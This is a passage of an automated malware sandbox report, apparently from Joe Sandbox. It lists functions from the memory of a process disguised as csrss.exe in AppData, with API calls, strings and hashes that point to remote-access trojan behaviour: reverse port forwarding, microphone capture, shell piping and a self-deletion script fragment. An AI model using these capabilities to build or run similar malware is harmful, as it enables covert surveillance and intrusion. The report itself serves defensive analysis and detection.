String ID: On Error Resume Next$fso.DeleteFolder "$while fso.FileExists("
API String ID: 1454597144-3131565726
Opcode ID: 5b1d196b7efd95aa3dea21f2c65bc5f6ba6c5828d4784a99bd280c1f657be264
Instruction ID: 6086234df79300c0d3d2b0b246ee18a1e7cd98ac8f48f246f340249f3cd82f18
Opcode Fuzzy Hash: 5b1d196b7efd95aa3dea21f2c65bc5f6ba6c5828d4784a99bd280c1f657be264
Instruction Fuzzy Hash: 9391AA729043019BD714EB75D890AAFB7E9AFD5200F50042DF18693996FF209E4EC772

Function 33D85179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293

_memcmp.LIBVCRUNTIME ref: 33D85423
_free.LIBCMT ref: 33D85494
_free.LIBCMT ref: 33D854AD
_free.LIBCMT ref: 33D854DF
_free.LIBCMT ref: 33D854E8
_free.LIBCMT ref: 33D854F4

Strings

C, xrefs: 33D852E1

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: f1252ca559168535bcbdfd65ad7ce99598add91b51cd7333d999a9b424cbbbbb
Instruction ID: 7b344026f04582ac6abd868c275c2118abc9d785a95a15c458677ae17e959e04
Opcode Fuzzy Hash: f1252ca559168535bcbdfd65ad7ce99598add91b51cd7333d999a9b424cbbbbb
Instruction Fuzzy Hash: 5BB12675A01319DBEB24CF28C884B9DB7B5FB08705F5445EAD949AB650EB30BE90CF90

Function 33D514F5 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 33D51514
inet_ntoa.WS2_32(?), ref: 33D515AF

Strings

StopForward, xrefs: 33D51690
StartReverse, xrefs: 33D5167F
GetDirectListeningPort, xrefs: 33D516B2
StopReverse, xrefs: 33D516A1
StartForward, xrefs: 33D51673

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: 670054346dd3ea57d300ccb014844e19db8c2d76c624b3bd70fa686e8dd23f3e
Instruction ID: 4a613afff4a6e53fdc115ae9c81d66ef7bde9f4541ff6b443d491072d867bc49
Opcode Fuzzy Hash: 670054346dd3ea57d300ccb014844e19db8c2d76c624b3bd70fa686e8dd23f3e
Instruction Fuzzy Hash: BB51C133F443409BEF04FB79C855A6E37E5AB84680F840529F4529BAD1EF74890AC7E2

Function 33D5B047 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 33D5B13C
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,33DA60A4), ref: 33D5B178
PathFileExistsW.SHLWAPI(00000000), ref: 33D5B18E
SetEvent.KERNEL32 ref: 33D5B219
WaitForSingleObject.KERNEL32(000001F4), ref: 33D5B22A
CloseHandle.KERNEL32 ref: 33D5B23A

Strings

open ", xrefs: 33D5B0D0

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
String ID: open "
API String ID: 1811012380-3219617982
Opcode ID: c8935526acf714569f6fb560a6fe8383c58d317504cc673c4d90f9c5233f227b
Instruction ID: 9f1769b8e220f076eb1f04c01789f645daf0f2dc016fee857439f55b9f32d2d4
Opcode Fuzzy Hash: c8935526acf714569f6fb560a6fe8383c58d317504cc673c4d90f9c5233f227b
Instruction Fuzzy Hash: 3D51E772A08305AFE604EB79DC91EAF7BECEB84155F40041DF14693991EF204D4ACB76

Function 33D47260 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Roaming\csrss.exe, xrefs: 33D476C4
Rmc-9VASLD, xrefs: 33D476DA
@{t, xrefs: 33D476A4
H#z, xrefs: 33D47697

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID:
String ID: @{t$C:\Users\user\AppData\Roaming\csrss.exe$H#z$Rmc-9VASLD
API String ID: 0-1173607199
Opcode ID: dfef8e602ac1123524f50e361dfa81edb3d70990e18699a92e2d2cf0534090f7
Instruction ID: ad174765b3434c043fb8579667d995f19989b05a7196b1984e13fb6648fae3e5
Opcode Fuzzy Hash: dfef8e602ac1123524f50e361dfa81edb3d70990e18699a92e2d2cf0534090f7
Instruction Fuzzy Hash: 5BF0B4B7A51341DFEE447B7AC9186583BDBA785A82F840415F463EA784EF604802C7A0

Function 33D89190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 33D89212
_free.LIBCMT ref: 33D89236
_free.LIBCMT ref: 33D893BD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,33D9F234), ref: 33D893CF
WideCharToMultiByte.KERNEL32(00000000,00000000,33DB2764,000000FF,00000000,0000003F,00000000,?,?), ref: 33D89447
WideCharToMultiByte.KERNEL32(00000000,00000000,33DB27B8,000000FF,?,0000003F,00000000,?), ref: 33D89474
_free.LIBCMT ref: 33D89589

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: b0cb184d9c5bc10d563eb39b62202f8ca7908d683545e42ca316e357935ba1f0
Instruction ID: 620e6eef4182ed27617887f8f39dbc8b5fd75a438ad90bce09033c356f890020
Opcode Fuzzy Hash: b0cb184d9c5bc10d563eb39b62202f8ca7908d683545e42ca316e357935ba1f0
Instruction Fuzzy Hash: 1DC10876D00345AFDB00DF78C840A9EBBF9EF45760F58019AD4D6AF681E730AA42C7A4

Function 33D4569A Relevance: 10.8, APIs: 7, Instructions: 278sleepfileprocessCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,33DB6BE8,33DB6CBC), ref: 33D4583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 33D45897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 33D458BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 33D458E9

Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36

WriteFile.KERNEL32(00000000,00000000,?,00000000,33DB4F90), ref: 33D459E4
Sleep.KERNEL32(00000064,00000062,33DA60A4), ref: 33D459FE
TerminateProcess.KERNEL32(00000000), ref: 33D45A17

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: FileProcessSleep$CreateNamedPeekPipeReadTerminateWritesend
String ID:
API String ID: 729113801-0
Opcode ID: c143c6364469f60a1f0d57defcc9c62958467c9a291bb1b9dd60367d8a8d6088
Instruction ID: ffc27cffadb99e96566070a36bed79cabfc072c27e5140571e4da3949cce66d6
Opcode Fuzzy Hash: c143c6364469f60a1f0d57defcc9c62958467c9a291bb1b9dd60367d8a8d6088
Instruction Fuzzy Hash: AC91B172A45308EFDB00FF35CC4092E7BFAEB84654F44042DF846A6691EE319C5A8B75

Function 33D93D83 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,33D9405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 33D93E2F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,33D9405C,00000000,00000000,?,00000001,?,?,?,?), ref: 33D93EB2
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,33D9405C,?,33D9405C,00000000,00000000,?,00000001,?,?,?,?), ref: 33D93F45
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,33D9405C,00000000,00000000,?,00000001,?,?,?,?), ref: 33D93F5C

Part of subcall function 33D86137: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,33D9405C,00000000,00000000,?,00000001,?,?,?,?), ref: 33D93FD8
__freea.LIBCMT ref: 33D94003
__freea.LIBCMT ref: 33D9400F

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 3218417feb4893ff91f44422147c609837075b7f749d229d8da2e31601d3983f
Instruction ID: b1eabc6441e076627bc869ee8fdd7ce7415a2f535504f47735caa27761ae37cf
Opcode Fuzzy Hash: 3218417feb4893ff91f44422147c609837075b7f749d229d8da2e31601d3983f
Instruction Fuzzy Hash: D991C476E003169FFB108EA5CC80EEEBBB5EF09B54F580659E945E7580DB35D881C7A0

Function 33D5490A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 33D54A46

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID:
String ID: udp
API String ID: 0-4243565622
Opcode ID: 6e935150370a5011039c95617c82f610bd07b7401c842c193c48da4932cfac33
Instruction ID: 86be041aee42be33068efca7c1b3c13b4b894131f6c2eedf9bcc21bb076b0992
Opcode Fuzzy Hash: 6e935150370a5011039c95617c82f610bd07b7401c842c193c48da4932cfac33
Instruction Fuzzy Hash: 5D7159B9A093028FFB15CF16C481A2AB7F4BF84B95F44442EF89597250EB74C984CB93

Function 33D90A25 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 33D90A94
_free.LIBCMT ref: 33D90AA2
_free.LIBCMT ref: 33D90BD0
_free.LIBCMT ref: 33D90BDB

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0fe1d9f15b206b29a3724329f4714f99dc18f46781dc24394692ccec78370bc4
Instruction ID: b9897380fa4f8c410126b2ddfd46d8a2fb5e18d8e5bff661b2d7091aa633d0ce
Opcode Fuzzy Hash: 0fe1d9f15b206b29a3724329f4714f99dc18f46781dc24394692ccec78370bc4
Instruction Fuzzy Hash: BA61D675D00305AFEB11CF68E841BDEBBF4EF09768F144169D954EB641E734AD418B90

Function 33D8B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 33D8B3FE
__fassign.LIBCMT ref: 33D8B479
__fassign.LIBCMT ref: 33D8B494
WideCharToMultiByte.KERNEL32(?,00000000,33D80BEE,00000001,00000001,00000005,00000000,00000000), ref: 33D8B4BA
WriteFile.KERNEL32(?,00000001,00000000,33D8BB31,00000000), ref: 33D8B4D9
WriteFile.KERNEL32(?,33D758B0,00000001,33D8BB31,00000000), ref: 33D8B512

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 8914511d6d4373746e744627a8e6c394b4b5ed19ebfa9fb10eadf1e9722ce9b2
Instruction ID: fe70260e32e1a6aecfd2c14901bbeebd1dd11e8fd6a24322f389213afd76f790
Opcode Fuzzy Hash: 8914511d6d4373746e744627a8e6c394b4b5ed19ebfa9fb10eadf1e9722ce9b2
Instruction Fuzzy Hash: 7151A5B5D002499FDB10CFA8C891AEEBBF8EF09711F14415AE965EB281E730E945CB60

Function 33D57CDF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D57DDC
CloseHandle.KERNEL32(00000000), ref: 33D57DE5
DeleteFileA.KERNEL32(00000000), ref: 33D57DF4
ShellExecuteEx.SHELL32(0000003C), ref: 33D57DA8

Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36

Strings

<, xrefs: 33D57D83
@, xrefs: 33D57D8A

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
String ID: <$@
API String ID: 1107811701-1426351568
Opcode ID: d95313b4cfa0c7101be8bcc2a2f7f9adb9f67e7760c230f93ce84679a76be05c
Instruction ID: c2b6a111e0fc4eba4b27edeee4c16601fde101faf9ccc2050e83deddc2c2fd83
Opcode Fuzzy Hash: d95313b4cfa0c7101be8bcc2a2f7f9adb9f67e7760c230f93ce84679a76be05c
Instruction Fuzzy Hash: 3D41AD32D403099BDF04EBA5DC55AFEB779AF50314F900168F506668E0EF741B9ACBA1

Function 33D57CDB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103filesynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D57DDC
CloseHandle.KERNEL32(00000000), ref: 33D57DE5
DeleteFileA.KERNEL32(00000000), ref: 33D57DF4
ShellExecuteEx.SHELL32(0000003C), ref: 33D57DA8

Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36

Strings

<, xrefs: 33D57D83
@, xrefs: 33D57D8A

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
String ID: <$@
API String ID: 1107811701-1426351568
Opcode ID: 044c4ce010009cf68da790a24e9fe1439f43709a553bb007c7662b5618e098ff
Instruction ID: 65517d2e4508923d62fc65f277146e3678ff8dc32bd6a3eae7ac23e89b40f92b
Opcode Fuzzy Hash: 044c4ce010009cf68da790a24e9fe1439f43709a553bb007c7662b5618e098ff
Instruction Fuzzy Hash: 7F31AF32D403499BDF05EBA5DC55AFEB778AF14314F500258F006668E0EF741B9ACBA0

Function 33D96B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6141030356ba8714c6b1f11cc23338af6e40142d84ea453b99e83abbfbb078b
Instruction ID: ca1f2397be56449a949a93a2a761bae250b09a895cf9c695bf3645b7fc56000f
Opcode Fuzzy Hash: f6141030356ba8714c6b1f11cc23338af6e40142d84ea453b99e83abbfbb078b
Instruction Fuzzy Hash: B51106B6A05318BFFB112F76CC0499B3AACEF85B74B004255F851DB580EE349841C3B0

Function 33D41BE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 33D41BF9
waveInOpen.WINMM(33DB2AC0,000000FF,33DB2AA8,Function_00000D0B,00000000), ref: 33D41C8F
waveInPrepareHeader.WINMM(33DB2A88,00000020), ref: 33D41CE3
waveInAddBuffer.WINMM(33DB2A88,00000020), ref: 33D41CF2
waveInStart.WINMM ref: 33D41CFE

Strings

H#z, xrefs: 33D41C27

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: H#z
API String ID: 1356121797-2410801705
Opcode ID: 5a83c14032103741b973c20c9a45098b6998cc4acee9658ff95ffdda4a3866b8
Instruction ID: a49917a1ed6a335fac84e443d5cba081a33d96c9207f06387090c6babb8b4563
Opcode Fuzzy Hash: 5a83c14032103741b973c20c9a45098b6998cc4acee9658ff95ffdda4a3866b8
Instruction Fuzzy Hash: AF21FA73914201DFDB29FF76CC1895A7BF9BF99650B04442AE106F7A90EB744403CBA9

Function 33D90EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 33D90C41: _free.LIBCMT ref: 33D90C6A

_free.LIBCMT ref: 33D90F48

Part of subcall function 33D86782: HeapFree.KERNEL32(00000000,00000000), ref: 33D86798
Part of subcall function 33D86782: GetLastError.KERNEL32(?,?,33D90C6F,?,00000000,?,00000000,?,33D90F13,?,00000007,?,?,33D9145E,?,?), ref: 33D867AA

_free.LIBCMT ref: 33D90F53
_free.LIBCMT ref: 33D90F5E
_free.LIBCMT ref: 33D90FB2
_free.LIBCMT ref: 33D90FBD
_free.LIBCMT ref: 33D90FC8
_free.LIBCMT ref: 33D90FD3

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction ID: 377efe735c67457ba70ad0f71da40da92a5161fbc9c4a490521c46e2163b9b60
Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction Fuzzy Hash: 27116671D44708BAE720AF71EC46FCB779CEF00702F404815BAEDEA850D6B9B90457A0

Function 33D7A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,33D7A351,33D792BE), ref: 33D7A368
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 33D7A376
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 33D7A38F
SetLastError.KERNEL32(00000000,?,33D7A351,33D792BE), ref: 33D7A3E1

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 94ff39a780bba4bc5d451e98b4e913200e48a5e3653d2eb97a8b6daa464257d8
Instruction ID: 7823efb33abcc4a08619224c631c5d88b52f6378a7b809ba7081d3bce38d131b
Opcode Fuzzy Hash: 94ff39a780bba4bc5d451e98b4e913200e48a5e3653d2eb97a8b6daa464257d8
Instruction Fuzzy Hash: 9D01D437A1C3119EF2052EF99C8675B278CEF02AF6720032AF928646D0EFA358125250

Function 33D5D45D Relevance: 10.5, APIs: 7, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 33D5D476

Part of subcall function 33D5D50F: RegisterClassExA.USER32(00000030), ref: 33D5D55B
Part of subcall function 33D5D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 33D5D576
Part of subcall function 33D5D50F: GetLastError.KERNEL32 ref: 33D5D580

ExtractIconA.SHELL32(00000000,?,00000000), ref: 33D5D4AD
lstrcpyn.KERNEL32(33DB4B60,33DACF34,00000080), ref: 33D5D4C7
Shell_NotifyIcon.SHELL32(00000000,33DB4B48), ref: 33D5D4DD
TranslateMessage.USER32(?), ref: 33D5D4E9
DispatchMessageA.USER32(?), ref: 33D5D4F3
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 33D5D500

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID:
API String ID: 1970332568-0
Opcode ID: 2941c2a04ebbf8efcca7e0b67a35b08436a56ad3583da9a71f99206c5bfa2d13
Instruction ID: df72be2e5e36fbc4600394aed9240cb0d177f2101c4d1da873a86acdc167a6ec
Opcode Fuzzy Hash: 2941c2a04ebbf8efcca7e0b67a35b08436a56ad3583da9a71f99206c5bfa2d13
Instruction Fuzzy Hash: D601DE72801249EBEB11EFA5C84DF9ABBFCEB95B05F004055F612A3184E7B5548A8B64

Function 33D7AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 33D7AC69
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 33D7AC85
__allrem.LIBCMT ref: 33D7AC9C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 33D7ACBA
__allrem.LIBCMT ref: 33D7ACD1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 33D7ACEF

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: e2b3cbaf62085b233323337bc68254ad5d621eee73a59ece424e332fdb7bae19
Instruction ID: 69842f844b74d7909eadff4aa83ddbef0c3d4b8eda194528a2cace8402a6d3d2
Opcode Fuzzy Hash: e2b3cbaf62085b233323337bc68254ad5d621eee73a59ece424e332fdb7bae19
Instruction Fuzzy Hash: A48118B6A00706ABE7119F78CC41B5A73E9AF40760F24452AF550DBB80FB76E94087A0

Function 33D83839 Relevance: 9.2, APIs: 6, Instructions: 217COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 33D838C9
_free.LIBCMT ref: 33D838E3
_free.LIBCMT ref: 33D838EE
_free.LIBCMT ref: 33D839C2
_free.LIBCMT ref: 33D839DE

Part of subcall function 33D7BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33D7BD1B
Part of subcall function 33D7BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 33D7BD3D
Part of subcall function 33D7BD19: TerminateProcess.KERNEL32(00000000), ref: 33D7BD44

_free.LIBCMT ref: 33D839E8

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
String ID:
API String ID: 2329545287-0
Opcode ID: dd4679e497a3ac440a36ccf5cad4bc4b97665c585b91728a2df2259eb48d0105
Instruction ID: 8055a860b7d7a94ec3c8f0ae46a772a0b2fbc602d308788ad285e37c03dc48b9
Opcode Fuzzy Hash: dd4679e497a3ac440a36ccf5cad4bc4b97665c585b91728a2df2259eb48d0105
Instruction Fuzzy Hash: AF51A37ED043046BDB049F68D8816AA77B8EF41B64F14015DE94C9FD40EA717D02C3A0

Function 33D51CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 33D5179C: SetLastError.KERNEL32(0000000D,33D51D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,33D51CFA), ref: 33D517A2

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,33D51CFA), ref: 33D51D37
GetNativeSystemInfo.KERNEL32(?), ref: 33D51DA5
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 33D51DC9

Part of subcall function 33D51CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,33D51DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 33D51CB3

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 33D51E10
RtlAllocateHeap.NTDLL(00000000), ref: 33D51E17
SetLastError.KERNEL32(0000045A), ref: 33D51F2A

Part of subcall function 33D52077: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?), ref: 33D520E7
Part of subcall function 33D52077: HeapFree.KERNEL32(00000000), ref: 33D520EE

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: ErrorHeapLast$Process$AllocAllocateFreeInfoNativeSystemVirtual
String ID:
API String ID: 2227336758-0
Opcode ID: 349a19ac5def50d07718335c36296b76de4bd6c91da35f7bdbe5a81e7d53d1d0
Instruction ID: 1c149867a4de6bfb0722cca19556f0d941b85074e87a4b7ed4beb4659a730dc5
Opcode Fuzzy Hash: 349a19ac5def50d07718335c36296b76de4bd6c91da35f7bdbe5a81e7d53d1d0
Instruction Fuzzy Hash: FA610675A00311ABFF009F25C980B6A7BE9BF84780F444159F849CB682EBB4D455CBE1

Function 33D858F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 33D85925
__cftoe.LIBCMT ref: 33D85957

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: adbf829966ef719e97ce3742ba7531073df1b076b812e379b030c9dc8b59a015
Instruction ID: 7681cd96a0aa21f403ace66e87f4fb020b3d36b1f0d3d60cc46194f34c04f131
Opcode Fuzzy Hash: adbf829966ef719e97ce3742ba7531073df1b076b812e379b030c9dc8b59a015
Instruction Fuzzy Hash: 92510ABAD00305ABEB009B69CCC0F9E77BEEF48771F58421AE8159E181DB31F90186B4

Function 33D454A0 Relevance: 9.2, APIs: 6, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 33D454BF
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 33D4556F
TranslateMessage.USER32(?), ref: 33D4557E
DispatchMessageA.USER32(?), ref: 33D45589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,33DB4F78), ref: 33D45641
HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 33D45679

Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID:
API String ID: 2956720200-0
Opcode ID: ffb6417a27506c6c3c9abdb28609299a02aaeb9cad5dd726c3daec9467b58b7e
